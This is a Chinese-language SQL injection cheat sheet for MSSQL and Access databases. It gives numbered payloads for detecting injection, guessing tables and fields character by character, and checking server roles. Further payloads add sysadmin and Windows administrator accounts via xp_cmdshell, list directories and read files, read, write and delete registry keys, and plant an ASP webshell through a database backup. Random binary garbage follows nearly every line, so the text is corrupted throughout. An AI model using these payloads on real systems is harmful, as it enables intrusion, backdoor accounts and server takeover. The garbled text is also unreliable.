1.判断是否有注入;and 1=1 ;and 1=2 $�niG)�@*
2.初步判断是否是mssql ;and user>0 g\�% Z+�Dc
�bFIM���07
3.注入参数是字符'and [查询条件] and ''=' �9�{wR��qY
[=Bcc�T:�b
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ,g�pZz$Ef(
�rJ)j./��c
5.判断数据库系统 ��f��DwK5?
Z��z�1nXUZ
;and (select count(*) from sysobjects)>0 mssql �vS��u
�dT
u4�h0s1iI�
;and (select count(*) from msysobjects)>0 access ^)y8X.��iO
Y�b=77(Q�V
*�4i�do��?
�rQxiG[0��
6.猜数据库 ;and (select Count(*) from [数据库名])>0 "<"m}rE?�Q
e��� �}�Mf
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �r7,}"�Pl
e\em;GTy��
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 B<Q)��z5KK
0NeIQr1�N_
9.(1)猜字段的ascii值(access) <D�[0mi0��
uGv|!UQ��w
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ]�"&](�e6*
Mg~4) DW�]
(2)猜字段的ascii值(mssql) yQ)&u+r���
rz0)S
py6
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ��B[I9<4�}
[j}JCmWY �
10.测试权限结构(mssql) =EY�WiK77a
z2>LjM)
#
[l3ys�����
57~y� 7/�0
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Pt�c+ypT�u
-&CO�I�-P8
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- XEn�u0�gr�
aeISb83Y�|
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- }�T0O~c{$i
��8t3m$�<7
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- <.mH-�Y5�i
9�T�a0L�i�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- dU#-��;/}o
�n)~*B�pL3
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- q)�mG6Su
d
`B�Qv;NtP
;and 1=(select IS_MEMBER('db_owner'));-- Z\$M)��e8n
u�&w})`+u5
"M, 1El�Q
$�~S�~pv�T
11.添加mssql和系统的帐户 .faf!3��d
Y
h�Q)�M�5
;exec master.dbo.sp_addlogin username;-- ruQt0q,W3%
;exec master.dbo.sp_password null,username,password;-- �8�qqN0"{,
�
vTgx7�gP
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- x_�/}R�3�d
lXg5Ur�W��
;exec master.dbo.xp_cmdshell 'net user username password ���tYXE$�i
xbBqR�_�H_
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- cGi���L9|k
5�f{P�% x(
;exec master.dbo.xp_cmdshell 'net user username password /add';-- :\vs kk),�
|�{&M#qX�e
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- n>�?�D-�)g
+�SR{���FF
S3:�A�itGJ
d=�n�@#|�3
12.(1)遍历目录 Kv(R|d6Lp
n m�<?oI*\
;create table dirs(paths varchar(100), id int) ~ ;Lz�TL��
'f!U[Qa�tg
;insert dirs exec master.dbo.xp_dirtree 'c:\' .�%s
U)$bH
~�ney~Pz_�
;and (select top 1 paths from dirs)>0 x��ZP*%yM�
f4fBUZ^ �A
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) f-G�)pH�m�
'L7qf'�R�V
S�IV �!8mz
�'S1�u@p,q
(2)遍历目录 G[\T�bP�h
#]x3��(}3W
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- V�J=>2'I�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 K�m;�}xke6
~\�mh��\a&
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 i1�|>JM�[V
+4.��s4&f)
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ���#D���4�
�{BmqUoZrC
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 !u�Q�T4<�g
4�/Y�?e�UQ
Lx�wi�"ndP
|82q|@�e��
13.mssql中的存储过程 ly���-(�F2
W;�'f�Aohr
xp_regenumvalues 注册表根键, 子键 E?�G'F3i��
{YgU23�;q
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 iCPm7��AU�
U\p`Y�Z��
xp_regread 根键,子键,键值名 MzD�1sWm�K
u0h%4�f!X
;exec xp_regread Td�'Mc�-/�
�RbX9PF"|+
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 cv�aG�[NF
l[Z o,�4�*
xp_regwrite 根键,子键, 值名, 值类型, 值 ��R(d<PlZ
�]*#i_dho7
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 >!t3~q1Cn
_6nAxm&x`%
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 u<Kow�t<ci
UP�I- j#yc
xp_regdeletevalue 根键,子键,值名 "5&"�Ij�,/
^��o{{�kju
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 /@�F'f�@�;
<NMJkl-r8r
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 v-t�I�`Qpb
S�O=�gG 2E
�
�xgcxA�:
C�gx:6T�RS
14.mssql的backup创建webshell b�^VR���pv
nwU],{(Hgr
use model �byxl�C?q7
[��,;e�,ld
create table cmd(str image); ���]~a�j�
\ZZ6r^99��
insert into cmd(str) values (''); 5�c�`�� ;~
. vb�##��D
backup database model to disk='c:\l.asp'; -N*[�f9EJB
$6a9<�&LP_
zr��/v�.$<
Y�"H`+U�V
15.mssql内置函数 1z�PS#K/3
@."K"i'Bl�
;and (select @@version)>0 获得Windows的版本号 w�.q`E@ T*
�hzsQK�_;S
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 2y
-�
�QH
&VGV0K3�Dp
;and (select user_name())>0 爆当前系统的连接用户 �u�u.X>agg
a+E
8s7C/D
;and (select db_name())>0 得到当前连接的数据库 ~_�fc�=�^o
wa8jr5/k�"
a9-M�c5^'n
N���PK��;�
16.简洁的webshell A0<�g�8pv�
$�@L;���j
use model �qWh�W4$7x
l+9RPJD/�:
create table cmd(str image); Dy�N[Yp|V
X"!j_*&ED�
insert into cmd(str) values (''); �Sb�[>R(0:
k24I1D�lR8
backup database model to disk='g:\wwwtest\l.asp';
